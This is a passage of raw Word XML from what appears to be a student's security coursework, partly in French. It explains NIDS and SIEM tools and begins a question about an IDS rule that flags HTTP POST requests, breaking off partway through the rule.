    <w:p w14:paraId="7268A689" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> détecter des adresses IP, noms de domaine ou User-Agent malveillants,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C9B9CD" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reconstruire des paquets réseau (fichiers, e-mails, requêtes HTTP...),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9B3D4" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> repérer des patterns d’attaque comme des injections de commande.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B48F1E" w14:textId="43065D7E" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Le NIDS ne bloque pas l’attaque en lui-même, il se contente de l’observer et d’émettre une alerte, ce qui en fait un outil essentiel pour la détection en temps réel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E32B71" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="001C7A69" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc197502161"/>
      <w:r w:rsidRPr="001C7A69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM – Security Information &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7A69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C7A69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="61067B12" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Un SIEM est une plateforme de centralisation et d’analyse des logs provenant de différentes sources : NIDS, HIDS, firewalls, antivirus, serveurs, proxy, etc. Il permet d’indexer, corréler et analyser ces données pour détecter des anomalies ou des attaques complexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC4677" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>D’après le cours, un SIEM est particulièrement utile pour :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1836C4" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>croiser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> des événements issus de multiples systèmes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA00DA" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>déclencher</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> des alertes enrichies et contextualisées,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFF8A94" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reconstituer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> des scénarios d’intrusion précis (ex : connexion SSH suspecte en dehors des horaires habituels).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274325F" w14:textId="77777777" w:rsidR="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Des solutions comme </w:t>
      </w:r>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Graylog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sont souvent déployées pour mettre en œuvre un SIEM en entreprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1C089" w14:textId="77777777" w:rsidR="00DC4DF7" w:rsidRDefault="00DC4DF7" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA222D2" w14:textId="77777777" w:rsidR="00DC4DF7" w:rsidRDefault="00DC4DF7" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA378B6" w14:textId="77777777" w:rsidR="00DC4DF7" w:rsidRDefault="00DC4DF7" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344A8DDB" w14:textId="77777777" w:rsidR="00DC4DF7" w:rsidRDefault="00DC4DF7" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5844429D" w14:textId="77777777" w:rsidR="00DC4DF7" w:rsidRDefault="00DC4DF7" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B76B9A7" w14:textId="77777777" w:rsidR="00DC4DF7" w:rsidRDefault="00DC4DF7" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158318E9" w14:textId="77777777" w:rsidR="00DC4DF7" w:rsidRDefault="00DC4DF7" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782EDDB8" w14:textId="77777777" w:rsidR="00DC4DF7" w:rsidRPr="009C3034" w:rsidRDefault="00DC4DF7" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781DA55B" w14:textId="1DE4EF56" w:rsidR="00DF1058" w:rsidRDefault="002331ED" w:rsidP="002331ED">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc197502162"/>
      <w:r w:rsidRPr="001F6789">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="1034EF23" w14:textId="77777777" w:rsidR="001F6789" w:rsidRDefault="001F6789" w:rsidP="001F6789">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F4F58F" w14:textId="5B82088C" w:rsidR="001F6789" w:rsidRDefault="001F6789" w:rsidP="001F6789">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F6789">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>As explained, the alert has been triggered by a NIDS rule. The SOC team shared with you the rule. Explain what it is supposed to detect and why this alert is relevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5222D3CE" w14:textId="77777777" w:rsidR="001F6789" w:rsidRDefault="001F6789" w:rsidP="001F6789">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FAC4FD" w14:textId="0FC2CD0E" w:rsidR="008810FA" w:rsidRPr="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Règle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>donnée:</w:t>
      </w:r>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48252BF9" w14:textId="77777777" w:rsidR="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7816F241" w14:textId="77777777" w:rsidR="008810FA" w:rsidRPr="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">alert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2358A9C4" w14:textId="77777777" w:rsidR="008810FA" w:rsidRPr="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    msg: "Suspicious HTTP POST request</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B758B50" w14:textId="77777777" w:rsidR="008810FA" w:rsidRPr="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flow:to_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="076E3E01" w14:textId="77777777" w:rsidR="008810FA" w:rsidRPr="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content:"POST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2B4D59D9" w14:textId="77777777" w:rsidR="008810FA" w:rsidRPr="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
